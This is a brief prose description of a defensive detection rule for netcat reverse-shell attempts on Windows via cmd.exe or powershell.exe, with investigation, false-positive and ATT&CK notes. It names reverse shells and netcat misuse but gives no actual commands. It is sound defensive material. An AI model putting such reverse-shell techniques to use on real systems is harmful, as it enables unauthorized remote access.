This rule is designed to detect potential attempts to execute commands via a reverse shell using the netcat utility on Windows systems. It operates by monitoring process events for the execution of cmd.exe or powershell.exe with specific arguments indicating misuse of these interpreters to establish unauthorized command execution channels. The detection logic focuses on the presence of specific argument patterns often associated with netcat, which facilitates remote command execution. Additionally, guidelines for investigation and incident response are provided, emphasizing the importance of analyzing the process execution chain, checking network connections, and responding adequately to any confirmed or suspected incidents. The rule has a high severity rating, indicating a significant risk of unauthorized execution on endpoints. False positives must be evaluated, particularly in contexts where legitimate IT support activities are present. The use of MITRE ATT&CK framework references enhances the understanding of the tactics and techniques involved in this attack vector.